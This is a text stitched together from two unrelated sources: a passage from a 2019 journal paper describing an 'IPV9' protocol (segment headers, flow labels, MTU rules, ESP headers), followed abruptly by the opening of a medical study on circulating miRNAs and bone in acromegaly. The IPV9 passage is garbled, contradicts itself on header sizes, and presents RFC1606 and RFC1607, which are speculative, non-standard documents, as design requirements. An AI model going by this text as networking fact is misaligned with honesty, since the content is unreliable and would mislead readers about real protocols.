No.01, 2019 18 use any legal, non-multicast address as the initial destination address. 6) Data segment header IPV9 source hosts use segment headers to send MTU packets that are longer than the packet delivery path. Different from IPv4, in IPV9, only the source host completes the segmentation, rather than the router on the path of the packet. The data segment header is identified by setting the next header to 44 in its previous header, as shown in table 9. TABLE IX. DATA SEGMENT HEADER FORMAT Next header Reserve Data segment offset Reserve M Identifier Next header: It is an 8 bit selector. The initial header type (defined below) that identifies the data segment portion of the original packet. Use the same values as the IPv4 protocol fields [RFC-1700]. Reserve: It is an 8-bit field. It is initialized to zero at the sender and ignored at the receiver. Data segment offset: It is an 8-bit field. The number of bytes moved forward or backward from the specified position. M: Flag 1 indicates that there are more data segments, and 0 indicates the last data segment. Identifier: It has 32-bit field. In order to send MTU packets whose length is longer than the transmission path, the source node can split the packet into several data segments and send each data segment as a separate data packet, and then reassemble the data packet at the receiver. For each packet to be segmented, the source node generates an identifier value for it. Any piece of data in any recently delivered packet with the same source and destination addresses must have a different identifier. If a routing header is present, the destination address being considered is the final destination address. 7) Destination options header The destination option header is used to carry the option that only needs to be checked by the packet's final node. The destination option header is identified by the header before it, with the next header field value of 60; the format is shown in table 10. TABLE X. HEADER FORMAT OF DESTINATION ADDRESS OPTIONS Next header Length of extension header Option Next header: Bit selector. This is an identifier type of header that follows the destination option header. Use the same value as the IPv4 [RFC-1700]. Length of extension header: It is an 8-bit unsigned integer. The destination option header length is in 8-bit groups, and does not contain the first 8-bit group. Option: It’s a Variable length field, whose length makes the destination option header length an integer multiple of 8-bit group. It contains one or more TLV encoding options. Optional destination information in IPV9 packets is encoded in two ways: defined in the destination options header, or as a separate extended header. Data segment headers and authentication headers are two examples of the latter. Which one to take is depends on the action if the destination node could not recognize the option information. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 19 a) If the destination node operation is want to abandon packets, and only in the destination node address of the packet is not the multicast address, then send the packet source address a "ICMP Unrecognized Type” message, and then these messages can be encapsulated into a separate header, or destination option in a header option, and the highest two digits of the option type are 11. This choice depends on a number of factors, such as fewer bytes, better alignment, or easy to parse. b) If both operations are required, the messages must be encoded as an Option at the head of the destination Option, whose Option type has a highest two digits is 00, 01, or 10, specifying which actions will be take. Note: When the next header field of an IPV9 header or any extended header is 59, which means there's nothing behind the header. If the IPV9 header payload length field indicates that there are 8-bit groups after the next header field of 59, these 8-bit groups must be ignored, and the content is passed as is when the packet must be forwarded. III. PACKET LENGTH DESIGN IPV9 requires a minimum of 576 MTU per link on the Internet. On any link, if it cannot pass 576 8-bit groups in one packet, then the data segment and reassembly associated with the link must be supported by the hierarchy below IPV9. For each link directly connected to the node, the node must be able to accept packets as large as MTU. Links with configurable MTU (such as PPP links [RFC-1661]) must be configured with at least 576 8-bit groups, and larger MTU is recommended to accommodate possible encapsulations (such as tunnels) without fragmentation. IPV9 nodes are recommended to implement Path MTU Discovery [RFCc-1191] in order to discover and take advantage of MTU links larger than 576. However, a minimal IPV9 implementation (such as in a BootROM) can simply restrict itself from sending packets larger than 576 and omit the Path MTU Discovery implementation. In order to send MTU packets with a length greater than the link, the node can segment the packet at the source node and assemble it at the destination node by using the data segment header of IPV9. However, this fragmentation is not recommended in any application unless it can resize packets to fit the MTU of the link being measured. A node must be guaranteed to accept segmented packets that exceed 1500 bytes after reassembly, including IPV9 headers. However, a node must ensure that it does not send segmented packets larger than 1500 bytes after reassembly unless it is explicitly told that the destination node can assemble such a large packet. When sending an IPV9 Packet to an IPv4 node (that is packets go through the transition from IPV9 to IPv4)), the IPV9 source node may receive an "ICMP Packet TOO Big" (ICMP Packet is TOO Big) message reporting that next-hop MTU must be less than 576. In this case, IPV9 does not need to reduce the size of subsequent packets to less than 576, but must include a segment header in those packets so that the IPV9-IPv4 conversion router can obtain an appropriate identifier value for the constructed IPv4. This means that the load can be reduced to 496 8-bit groups (576 minus 72 bytes for IPV9 headers and 8 bytes for data segment headers) or even smaller if additional extended headers are used. In order to send MTU data packets whose length is longer than the link, such as audio, image and video, long-stream code and absolute return code can be selected. The node can use the data segment header of IPV9 to identify the data packets in the source node without segmentation and assemble them in the destination node. However, when the sender and the receiver receive the signal disconnected by the return code, they will return to normal working condition. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 20 Note: unlike IPv4, IPV9 does not require a "Don't Fragment" flag in the packet header to perform Path MTU Discovery, which is an implicit feature of IPV9. And the process associated with using MTU in RFC- 1191 is not applicable to IPV9, because the message of IPV9 "Datagram Too Big" is always identifies the exact MTU being used. Also, the procedures associated with the use of MTU tables in rfc-1191 are not applicable to IPV9 because the IPV9 version of the "Datagram Too Big" message always identifies the exact MTU being used. Unlike IPv4 and IPv6, IPV9 can transmit the practical applications such as audio or video, it need to use the ever-flowing code and absolute return code, thus formed in the reserved the actual circuit actually has become a three layer structure, so there is no try to transfer the concept of content as guaranteed delivery channels and reliable safety, guarantee the transmission content don't interrupt. This results in the co-existence of the three - and four-tier architectures within the IPV9 network. IV. FLOW LABEL A data flow is a sequence of packets sent from one source to another destination address (point-to-point or multicast), and the source nodes require the intermediate router to have special control over these packets. These special processes can be transferred to routers through control protocols, such as resource reservation protocols, or through the information carried by the packets themselves in the data stream, such as segment options. There may be multiple active streams between a pair of source and destination nodes, as well as many communications independent of any flow. A flow is uniquely identified by a combination of a source address and a non-zero flow label. The flow label field for packets that do not belong to any flow is set to 0. The flow label is assigned by the source node of the data flow. New flow tags must be randomly selected (pseudo random), ranging from 1 to 16777215 (decimal). The purpose of the random assignment is to make the bits in the flow label suitable for use as hash keys in routers to find the relevant state of the flow. All packets belonging to the same flow must be sent with the same source node address, destination node address, priority, and flow label. If any of these packets contain a segment option header, they must all have the same segment option header content. If any of their packets contain a routing header, all of their extended headers preceding the routing header must have the same content, including the routing header (except for the header field next to the routing header). Allows, but does not require, the router and destination node to check whether the above requirements are met. If a collision is detected, it should sending "ICMP parameter has a problem, code 0" message and then pointing to the high bit of the flow label (i.e., within the IPV9 packet with an offset of 1). Routers are free to set the flow control state of based on "timing" even when there is no explicit flow control protocol, segment options, or other methods provide them with flow creation information. For example, when a flow label with an unknown, non-zero label is received from a particular source node, the router can process its IPV9 header and any other necessary extension headers as if the flow control label were 0. The flow control state described above, after being set and cached according to "timing" must be discarded within 6 seconds, whether or not packets of the same class continue to arrive. If another packet with the same source address and flow control label arrives after the cache state has been discarded, then the packet must undergo full normal processing (as if the flow control label is 0), this process may cause the flow control state of the flow to be re-established and cached. The lifetime of explicitly established flow control states, such as flow control states created by control protocols or segment options, must be specified as part International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 21 of the explicit establishment mechanism and can exceed 6 seconds. During the lifetime of any flow control state that was previously created, the source node must not use this control label for new flows. Since any flow control state created depending on "timing" has a lifetime of six seconds, the minimum time between the last packet of a flow and the first packet of a new flow to use the same flow label is six seconds. The flow label has a longer lifetime and cannot be reused for new flows during the lifetime. When a node is off and restarted (for example due to a system crash), care must be taken to avoid using flow label that it might have used for previously created flow that have not yet expired. This can be achieved by record flow label in the memory, so that it can recall flow label previously used after a system crash, or until the previously created, there may be one of the biggest lifetime timeout before does not use flow label (at least for 6 seconds, if it use an explicit flow and establish a mechanism, and specifies the longer life span, even longer time). If the reboot time of a node is known (usually more than 6 seconds), the amount of time to wait before starting to allocate flow tags can be deducted accordingly. V. CATEGORY TYPE DESIGN The 8-bit Category Type field in the IPV9 header enables the source node to identify the desired level of packet delivery determination, certainly relative to other packets sent from the same node. Category Type bits contain two parts: 3 bits high is used to specify the address length, the value is 0 ~ 7, is 2 to the power, the address length is 1Byte ~ 128Byte; the default value is 256 bits, where 0 is 16 bits, 1 is 32 bits, 2 is 64 bits, 3 is 128 bits, 4 is 256 bits, 5 is 512 bits, 6 is 1024 bits, and 7 is 2048 bits. The last five bits specify two ranges of communication categories, with values 0 ~ 7 used to specify the information priority provided by the source node for congestion control, that is, the priority of information sent with a delay in the face of congestion, such as TCP information. 8 ~ 15 are used to specify the priority of messages that are sent without delay in the face of congestion, that is, the priority of "real time" packets that are sent at a fixed rate. For crowd-constrained information, the following priority values can be used for specific application classes. 0: Non-character information, 1: Fill in the information (such as: net news), 2: Unattended information (such as: Email), 3: Reserve, 4: Large quantities of supervised information (such as: FTP、NFS), 5: Reserve, 6: Interactive information (such as: Telnet, X), 7: Internet control information (Such as: Routing protocol, SNMP), 8: For audio, 9: For video, 10: For video or audio compression will not be error due to alignment error, 11: Broadcast with audio and video, 12: Emergency use. For messages that are not congested, the lowest rating value of 8 should be used for packets that the sender most wants to discard in crowded conditions (such as high-fidelity video messages), and the highest rating value of 15 should be used for packets that the sender least wants to discard (such as low-fidelity audio messages). There is no corresponding sequential relation between the rank of un-crowded and the priority of crowded. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 22 VI. UPPER PROTOCOL DESIGN A. Upper protocol check If any transport protocol or other upper layer protocol includes the address in the IP header when calculating its checksum, then in order to be able to run on IPV9, the algorithm that calculates the checksum must be modified to include addresses with a length of 16-2048 bits rather than 32-bit IPv4 addresses. TCP and UDP headers for IPV9 are shown in table 11. TABLE XI. TCP AND UDP HEADERS FOR IPV9 Source address Destination address Time Identify code Payload Length 0 Next header  1) If the packet contains the routing header, the destination address in the pseudo-header is the final address. In the source node, this address is the last address in the routing header; at the receiver, this address will be in the IPV9 header address field. 2) The value of the next header in the pseudo- header identifies the upper protocol (e.g., TCP is 6, UDP is 17). If there is an extended header between the IPV9 header and the upper protocol header, the value of the next header in the pseudo-header is different from the value of the next header in the IPV9 header. 3) The value of the load length field in the pseudo- header is the length of the upper protocol packet, including the upper protocol header. If there is an extended Payload between the IPV9 Payload and the upper protocol Payload it will take less Payload Length than the IPV9 Payload Length (or in the large Payload option). 4) Different from IPv4, when a UDP packet is sent from an IPV9 node, UDP checksum is not optional. That is, whenever an IPV9 node sends a UDP packet, it must calculate the UDP checksum. The checksum is generated by the packet and pseudo-header, and if the result is 0, it must be converted to hex FFFF and placed in the UDP header. The IPV9 receiver must abandon the UDP packet containing the checksum 0 and record the error. The checksum of ICMP version of IPV9 includes the above pseudo-header in its verification and calculation. This is a modification of the IPv4 version of ICMP, which does not include a pseudo-header in its verification and calculation. This change is made to ensure that ICMP is not passed incorrectly or corrupted by the IPV9 header fields on which it depends, which, unlike IPv4; these fields are not checked and protected by the Internet layer. The next header field in the pseudo-header of ICMP contains the value 58, which identifies the IPV9 version of ICMP. B. Maximum packet lifetime Unlike IPv4, IPV9 nodes like IPv6 do not require a mandatory maximum packet lifetime. This is why the "lifetime" field of IPv4 has been renamed IPV9's "segment limit". In practice, very fewer IPv4 complies with the current packet lifetime, so this is not a practical change. Any protocol that relies on the Internet layer (whether IPV9 or IPv4) to limit the lifetime of packets should be upgraded to rely on its own mechanism to detect and discard stale packets. C. Maximum upper layer load When calculating the maximum load available for upper level protocol, it must be taking into account that the IPV9 header is larger than the IPv4 header. For example, in IPv4, TCP's MSS option is calculated by the maximum datagram length (the default value obtained through Path MTU Discovery) minus 40 8-bit groups (20 8-bit groups for the minimum length of IPv4 headers and 20 for the minimum length of TCP headers) from. When using TCP over IPV9, the MSS must be calculated by the maximum length minus 60 8-bit groups, because the minimum IPV9 header (when International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 23 IPV9 without an extended header) is 20 8-bit larger than the minimum IPv4 header. VII. FORMAT OF OPTIONS It is required to design the fields first when designing new options for segment option headers or destination option headers; these are based on the following assumptions. 1) Any field in the option data of an option that consists of multiple 8-bit groups should be aligned with their natural boundaries, that is, fields with n 8-bit groups of width should be placed at integer multiples of n 8-bit groups from the beginning of the segment header or destination option header, where n= 1,2,3,4 or 8. 2) Each segment header or destination option header takes up as little space as possible and must meet the requirement that the header length is an integer multiple of an 8-bit group. 3) It can be assumed that when any header with options appears, they only have a fewer options, usually only one. These assumptions mean that it needs planning the individual fields of an option, arrange the fields from smallest to largest, with no padding in the middle, and then derive the alignment requirements for the entire field based on the alignment requirements for the largest field. Examples are given below. Case1. If option X requires two data fields, one with a length of 8 8-bit groups and one with a length of 4 8- bit groups, it should be arranged according to table 12. TABLE XII. TWO FIELD DESIGN TABLE Option Type =X Option data length =12 Four 8-bit group fields Eight 8-bit group fields Its alignment requirement is 8n+2 to ensure that the eight 8-bit fields start with an 8-fold offset from the header. The full segment header or destination header with the above options is shown in table 13. TABLE XIII. FULL HEADER OR DESTINATION HEADER FORMAT Next header length of extension header =1 Option Type =X Option data length =12 Four 8-bit group fields Eight 8-bit group fields Case2. If option Y requires three fields, one with a length of four 8-bit groups, one with a length of two 8- bit groups, and one 8-bit group, the format is shown in table 14. TABLE XIV. THREE FIELD DESIGN FORMAT Option Length=Y Option data length =7 One 8-bit group fields Two 8-bit group fields Four 8-bit group fields Its alignment requirement is 4n+3 to ensure that the four 8-bit leader fields start at a 4 times offset from the header. The full hop-by-hop or destination option header with the above options is shown in table 15. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 24 TABLE XV. A THREE-FIELD FULL DATA FORMAT Next header length of extension header =1 Pad1 option =0 Option Type =Y Option data length =7 One 8-bit group field Two 8-bit group fields Four 8-bit group fields PadN option=1 Option data length =2 0 0 Case3. The segment header or destination header for each option X and option Y in both case 1 and case 2 should be one of the following two formats, depending on which option appears first, as shown in tables 16 and 17. TABLE XVI. ONE FORMAT OF CONTAIN BOTH TWO - AND THREE-FIELD ADDRESS Next header length of extension header =3 Option Type=X Option data length =12 Four 8-bit group fields Eight 8-bit group fields PadN Option =1 Option data length =1 0 Option Type=Y Option data length =7 One 8-bit group fields Two 8-bit group fields One 8-bit group fields PadN option=1 Option data length =2 0 0 TABLE XVII. ANOTHER FORMAT OF CONTAIN BOTH TWO - AND THREE-FIELD ADDRESS Next header length of extension header =3 PadN option=1 Option Type=Y Option data length =7 One 8-bit group fields Two 8-bit group fields Four 8-bit group fields PadN option=1 Option data length =4 0 0 0 0 Option Type =X Option data length =12 Four 8-bit group fields Eight 8-bit group fields VIII. ENCAPSULATE SECURITY PAYLOAD HEADER DESIGN A. Format of encapsulate security payload header ESP (Encapsulating Security Payload) Header is designed to provide mixed security services in IPv4. The ESP mechanism can be applied with the authentication header or in a nested manner in tunnel mode alone. Security services may be provided between a pair of communicating hosts, or between a pair of communicating security gateways, or between a security gateway and a host. The primary difference between the authentication header and the ESP mechanism is the effective area service. The encapsulation security payload mechanism does not protect any IP header fields unless they are encapsulated by the ESP, such as in tunnel mode where the IP header is encapsulated underneath. The encapsulation security header is inserted after the IP header. In transport mode, the encapsulated security header is in front of the upper layer protocol header, and in tunnel mode, the encapsulated security header is in front of the encapsulated IP header. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 25 ESP mechanisms provide services such as confidentiality, data origin authentication, connectionless integrity, anti-replay services (a form of partial sequence integrity), and limited communication confidentiality. The business provided by this mechanism depends on the options and the location of the application when the security association is established. Confidentiality can be independent of other business options. However, the use of confidentiality alone without integrity authentication can lead to attacks that compromise the confidentiality of communication. Data origin authentication and connectionless integrity are federated services that can be provided as an option along with confidentiality services. The anti-replay service can only be selected if the data origin authentication service is selected, which is entirely up to the receiver. The confidential service requires selection in tunnel mode, and this service is most effective when it used in the security gateway, because the clustering of communication on the gateway may mask the true source and host address modes. Note that while both confidentiality and authentication services are optional, at least one of them should be chosen. A protocol header (IPv4 header, IPV9 base header, or extended header) that precedes the ESP header will have a value of 50 in its protocol field (if IPv4 header) or in its next header field (if it is the IPV9 extended header). The format of ESP groups and headers is shown in table 18. TABLE XVIII. FORMAT OF ESP GROUPS AND HEADERS 0 8 16 24 31 Security Parameters Index（SPI） Sequence Number Payload Data（variable length） Fill field（0~255B）） Pad Length Next Header Authentication Data（variable length） Note: the scope of the certification business is the part before the certification data (authentication data is not included); the scope of the encryption service provided is the portion of the data that follows the serial number and precedes the authentication data (Serial Numbers and authentication data are not included). B. Description of safe load format The fields in the header format are explained below. The "optional" of the text indicates that if the field is not selected, the field is ignored and is not used when calculating the overall check value. If "required", this field must appear in the ESP group. 1) Security Parameters Index（SPI) It is a required field of 32 bits. This field is associated with the security of the datagram that uniquely identifies the address of the address IP and the security protocol. The value of the SPI can be any, currently from 1 to 255 is reserved by IANA (). The value 0 of SPI is reserved for local, specific application use. 2) Sequence Number It is a 32bit monotonically increasing counter (serial number). This field is required even if the receiver does not select to enable the playback service for a particular security association. The processing of this sequence number field is entirely done by the receiver, that is, the sender must transmit this field, and the receiver may or may not comply with the field. When a security association is established, both sender and receiver counters are set to 0. If the anti- replay is started (default is enabled), the serial number International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 26 transferred does not allow loops. Therefore, after a secure association group, the sender and receiver counters must be reset. 3) Payload Data It is a variable-length field that contains the data described by the next header field. The payload field is required and is an integer multiple of bytes in length. 4) Fill field This field is used for encryption. The purposes of use fill fields in the ESP header are as follows. a) If an encryption algorithm requires the body to be an integer multiple of bytes, the padding bytes are used to the body. (In addition to the filling fields themselves, the payload data, the filling length, and the next header fields are also included) to meet the data length requirements of the encryption algorithm. b) Even without considering the requirements of the encryption algorithm, fields need to be filled in to ensure the length of the encrypted data terminates at the boundary of 4B. In particular, the length of the fill length field and the next header field must be aligned to 4B. c) Apart from above algorithmic and alignment requirements, padding fields may also be used to hide the true length of the payload and partially encrypt the communication. However, this additional padding obviously consumes bandwidth resources and should be used with caution. The sender can add 0 to the 255B to the fill field. Padding is optional in an ESP group, but all applications must support the generation and use of padding fields to satisfy the encryption algorithm for the length of the encrypted data while ensuring that the authentication data is aligned to the 4B boundary. d) Pad Length This field is required, and the valid fill length value should be from 0 to 255, with 0 indicating no fill bytes. e) Next header This field is required and is an 8-bit field indicating the data type in the payload data field. f) Authentication Data It is a variable-length field that contains the group's Integrity Check Value (ICV), which is calculated from the ESP group except the authentication data. This field is optional and only occurs if the authentication business is included in the security association. The authentication algorithm must account for the full length of the verification value and the relative rules of validation and processing steps. C. Processing of security payload header Encapsulated security payloads (ESP) are used in two ways: transport mode or tunnel mode. 1) Transmission mode Transmission mode applies only to host applications. In this mode, the ESP header only protects the upper layer protocol and not the IP header field. In this mode, the ESP header is inserted after other IP headers and before the upper layer protocols of TCP, UDP, and ICMP. In IPV9, the ESP header is treated as an end-to-end payload, so the header must appear after the hop-to-hop, route, and segment headers. The host option header may appear before or after the ESP header, depending on the semantics required. The locations of the ESP headers in a typical IPV9 packet in transport mode are shown in tables 19 and 20. TABLE XIX. DATAGRAMS BEFORE THE APPLICATION OF ESP HEADER Basic header Extension header(if any) TCP Data International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 27 TABLE XX. DATAGRAM AFTER THE APPLICATION OF ESP HEADER Basic header Hop-to-hop, Destination header Route header Segment header ESP Destination Options header TCP Data ESP Trailer ESP authentication The encrypted portion of the above packet can be a basic header encryption or a host option header, TCP, data, and ESP tail. The authenticated part in addition to the above part is encrypted, but also the package security load. 2) Tunnel mode The ESP header in tunnel mode can be used for host or security gateway. Tunnel mode must be used when the ESP header is applied to the security gateway to protect the user's transmission communication. In tunnel mode, the "lower" IP header carries the final source and destination address, while the "upper" IP headers contain the other addresses, such as the address of a security gateway. In tunnel mode, the ESP header is positioned relative to the "upper" IP header as it is in transport mode. The position of the ESP header in a typical IPV9 packet in tunnel mode is shown in table 21. TABLE XXI. ESP HEADERS IN TYPICAL IPV9 PACKETS IN TUNNEL MODE upper Basic header Upper Extension header (if any) ESP lower Basic header Upper Extension header (if any) TCP Data ESP Trailer ESP authentication In the above group, the encrypted part can be the upper basic header, the lower basic header, the lower extended header, TCP, data and ESP. The authenticated part in addition to the above part is encrypted, but also the ESP. IX. CONCLUSION This paper is a specific research and design scheme of RFC1606 and RFC1607 for the future network. The 42-layer routing address space is described according to the document in RFC1606. IPV9 has a routing hierarchy of up to 42 layers, and this routing hierarchy is a key feature in its wide application. In order to protect previous investments, IPv4 and IPv6 compatible addresses have been set inside, with layers 1-41 designed for IPv4 and IPv6 compatibility and layer 42 described in the RFC1606 document. The large number of address Spaces in IPV9 also makes it possible to allocate addresses in a direct way In order to the application of IP mobile, IPTV, IP phone, Internet of things and other network applications that need to use Arabic numerals to represent and need to use characters that do not have to be analyzed again, this design also designed a character router. IPV9 address length is designed according to the document of RFC1607 that the network address length is 1024 bits in the future network, and the address space length is designed as 2048 bits according to the actual demand, thus solves the address space capacity problem in the next 750 years. In order to meet the technical demand of RFC1606 and RFC1607, the definitions of routing hierarchy, address length, address working mode, address space International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 28 resource, address text representation method, compression definition and separator were redefined, Please refer to other related articles of this design team. REFERENCES [1] Tang Xiaodan etc. Computer Operating System (third edition) [M]. Xi’an: Xidian university press, 2010. [2] Xie Jianping etc. A method of assigning addresses to network computers using the full decimal algorithm [P]. CN: ZL00135182.6, 2004.2.6. [3] Xie Jianping etc. Method of using whole digital code to assign address for computer [P]. US: 8082365, 2011.12. [4] RFC - Internet Standard. Internet Protocol, DARPA INTERNET PROGRAM PROTOCOL SPECIFICATION, RFC 791, 1981.09. [5] S. Deering, R. Hinden, Network Working Group. Internet Protocol, Version 6 (IPv6)-Specification, RFC-1883, 1995.12. [6] M. Crawford. Network Working Group. Transmission of IPv6 Packets over Ethernet Networks. RFC-2464, 1998.12. [7] J. Onions, Network Working Group. A Historical Perspective on the usage of IP version 9. RFC1606. 1994.04. [8] V. Cerf, Network Working Group. A VIEW FROM THE 21ST CENTURY, RFC1607. 1994.04. [9] Xie Jianping, Xu Dongmei, etc. Digital domain name specification. SJ/T11271-2002, 2002.07. [10] Information technology-Future Network- Problem statement and requirement-Part 2: Naming and addressing, ISO/IEC DTR 29181-2, 2014, 12. [11] Wang Wenfeng, Xie Jianping, etc. Product and service digital identification format for information procession. SJ/T11603-2016, 2016. 06. [12] Radio frequency identification tag information query service network architecture technical specification. SJ/T11606-2016, 2016. 06. work_o46l7yr5gjexfd6bydo6qftijy ---- 8:1 39–49E Valassi et al. miRNAs and bone in acromegaly RESEARCH Circulating miR-103a-3p and miR-660-5p are associated with bone parameters in patients with controlled acromegaly Elena Valassi1, Natalia García-Giralt2, Jorge Malouf3, Iris Crespo1, Jaume Llauger4, Adolfo Díez-Pérez2 and Susan M Webb1 1Endocrinology/Medicine Department, Hospital Sant Pau, Centro de Investigación Biomédica en Red de Enfermedades Raras (CIBERER, Unidad 747), IIB-Sant Pau, ISCIII and Universitat Autònoma de Barcelona (UAB), Barcelona, Spain 2URFOA, IMIM (Institut Hospital del Mar d’Investigacions Mèdiques), Universitat Autònoma de Barcelona, Barcelona, Spain 3Mineral Metabolism Unit, Medicine Department, Hospital Sant Pau, Barcelona, Spain 4Radiology Department, Hospital Sant Pau, Barcelona, Spain Correspondence should be addressed to E Valassi: evalassi@santpau.cat Abstract Background: Biochemical control of GH/IGF-I excess in acromegaly (ACRO) is associated with persistent impairment of trabecular microstructure leading to increased risk of vertebral fractures. Circulating miRNAs modulate the activity of osteoblasts and osteoclasts, and may be potential biomarkers of osteoporosis. Aims: Identify differentially expressed miRNAs in the serum of patients with controlled ACRO vs controls and correlate miRNA levels with both biochemical and structural bone parameters. Patients and methods: Twenty-seven patients with controlled ACRO (11 males, 16 females; mean age, 48 ± 5 years; BMI, 28 ± 4 kg/m2) and 27 age-, gender- and BMI-matched controls were recruited. Areal BMD at lumbar spine and femur, and trabecular bone score were assessed; volumetric BMD was measured by quantitative computed tomography QCT-Pro (Mindways). Twenty miRNAs, chosen by their putative role in bone, were quantified in serum using real-time qPCR. Results: In ACRO patients, miR-103a-3p and miR-191-5p were found overexpressed, whereas miR-660-5p was underexpressed (P < 0.001). miR-103a-3p levels were negatively associated with both trabecular vBMD at trochanter and serum osteoprotegerin concentrations (P < 0.05) and positively with vitamin D concentrations (P < 0.01) and total cross-sectional area of the femoral neck (P < 0.05). miR-660-5p levels were correlated with both trabecular vBMD at trochanter and OPG concentrations (P < 0.05), but were negatively associated with vitamin D levels (P < 0.05). A negative correlation between miR-103-a-3p and miR-660-5p was found in both groups (P < 0.001). Conclusions: Circulating miR-103a-3p and miR-660-5p are differentially expressed in controlled ACRO patients and associated with bone structural parameters. miRNAs may be one of the mechanisms involved in the pathogenesis of bone disease and could be used as biomarkers in ACRO patients. -18-0482 Key Words f acromegaly f microRNAs f volumetric bone mineral density ID: 18-0482 8 1 Endocrine Connections (2019) 8, 39–49 This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-18-0482 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:15PM via free access mailto:evalassi@santpau.cat https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-18-0482 https://ec.bioscientifica.com E Valassi et al. miRNAs and bone in acromegaly 40 PB–11 8:1 Introduction Growth hormone (GH) and insulin-like growth factor-I (IGF1) are anabolic hormones which influence bone metabolism through the modulation of several signaling pathways (1). In vitro studies showed that GH enhances the proliferation and differentiation of osteoblastic cell lines driving the commitment of the mesenchymal stem cell (MSC) to the osteoblastogenesis (1, 2, 3). On the other hand, IGF1 enhances the function of mature osteoblasts and maintains appropriate levels of bone matrix and bone mass (1). Acromegaly (ACRO) is a rare disease caused by excessive GH production from a pituitary adenoma (4). Chronic elevation of GH and IGF1 in ACRO is associated with severe cardiovascular, respiratory and metabolic complications, which lead to an average 10-year reduction of life expectancy and a double standardized mortality rate as compared with the general population (5). Bone abnormalities are also a frequent manifestation of ACRO due to the deleterious effects of GH excess on bone remodeling and calcium homeostasis (1). ACRO patients show increased bone turnover and deterioration of both biomechanical competence and microarchitecture at the trabecular compartment (3, 6, 7). Of note, the latter has been associated with an increased prevalence of vertebral fractures even in the controlled patients, in the presence of normal lumbar areal bone mineral density (aBMD) (7). Cortical bone also appears to be impaired, in that a decrease in both bone material strength index (a marker of cortical bone properties), as assessed using microindentation, and femoral cortical volumetric bone mineral density (vBMD) have been described in ACRO patients despite biochemical control of the disease (8, 9). miRNAs are single-strand, non-coding RNAs that span between 19 and 24 nucleotide bases (10). These molecules are involved in the modulation of a wide variety of biological processes, including bone cell formation, bone remodeling, bone homeostasis and skeletal development (10). In particular, subsets of miRNAs influence the commitment and differentiation of the MSC into the osteogenic lineage by regulating several molecular pathways (11). Indeed, the deregulation of miRNA-mediated mechanisms has been described as an important pathogenic factor for bone degeneration and skeletal disease (11). Interestingly, miRNAs also circulate in serum as extracellular nuclease-resistant entities through a variety of carriers, such as exosomes, apoptotic bodies and vesicle-free lipoprotein (12). As a result, miRNAs have been advocated as promising biomarkers to predict onset and progression of chronic disease, including osteoporosis (13). Different levels of circulating miRNAs (‘signatures’) have been found in patients with both idiopathic (10) and postmenopausal osteoporosis (10, 14, 15, 16) and have been indicated as reliable predictors of fragility fractures in postmenopausal women with and without type 2 diabetes (10, 17, 18, 19, 20, 21). Belaya et al. recently analyzed bone samples from patients with active ACRO and found significant changes in the expression of several miRNAs involved in osteoblastogenesis (22). However, whether some circulating miRNAs are associated with bone abnormalities in ACRO and, therefore, could represent useful markers to predict persistent bone impairment in these patients is still to be determined. Thus, our cross-sectional study was aimed at evaluating if there are differentially expressed miRNAs in the serum of patients with controlled ACRO as compared with sex-, age- and BMI-matched healthy controls. In addition, we examined if these differentially expressed miRNAs are related to bone parameters in our patients, including bone turnover markers, vBMD at spine and femur and trabecular bone score (TBS), a tool designed to evaluate trabecular bone quality from the lumbar spine DXA image. Subjects and methods Subjects We studied 27 patients (16 females and 11 males) with controlled ACRO who have been recruited successively while attending our clinic. Eighteen of these patients (66%) had been evaluated in previous studies from our center (8, 23). Controlled ACRO was defined as IGF1 concentrations within the specific age-adjusted reference range, and in those patients who were not on GH receptor antagonist, random GH concentrations were lower than 1 ng/mL. When the 75 g oral glucose load test was performed, the GH value equal to or <0.4 ng/mL were considered suggestive of cured disease (24). All had a GH-secreting pituitary tumor confirmed pathologically. Five patients were on pharmacological treatment: three on somatostatin analogs (SSa) and the other two were on combination therapy with a SSa and either cabergoline or pegvisomant. All patients had transsphenoidal surgery from 6 months to 25 years (median: 5 years) prior to the This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-18-0482 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:15PM via free access https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-18-0482 https://ec.bioscientifica.com E Valassi et al. miRNAs and bone in acromegaly 418:1 inclusion in the study, and seven of them also received radiotherapy from 7 to 24 years (median: 16 years) after unsuccessful surgery. Three patients had secondary adrenal insufficiency, and all of them were on stable replacement dose of hydrocortisone. Five patients had secondary hypothyroidism and were on stable replacement therapy with levothyroxine at the time of the study. Four males had secondary hypogonadism. Because all of them were on stable testosterone replacement for more than 1 year, they were considered eugonadal. Nine women had regular menses and seven were postmenopausal. None of the patients had GH deficiency, diagnosed when IGF-I levels were below two standard deviations for the age- sex normal range in a patient with at least three other documented hormone deficiencies or with a peak plasma GH less than 3 μg/L during and insulin tolerance test (ITT) (25). Mean (±s.d.) duration of disease was 164 ± 119 months and was estimated as the time elapsed between the onset of symptoms and signs of ACRO (evaluated through old photographs and clinical history) and the time when treatment was proven to be effective. Mean (±s.d.) duration of control was 146 ± 121 months and was calculated from the time between hormone normalization and study entry. Twenty-seven age-, gender- and BMI-matched controls were also studied, recruited through advertisements at the blood donor center of our Hospital. Control subjects who reported fragility fractures or who had morphometric vertebral fractures of any grade were excluded from the study. A fragility fracture was defined as any low-energy fracture, excluding those of the hands, feet and skull. Patients and controls with malignancies, inflammatory disorders, kidney or liver dysfunctions were also excluded from the study. Consent has been obtained 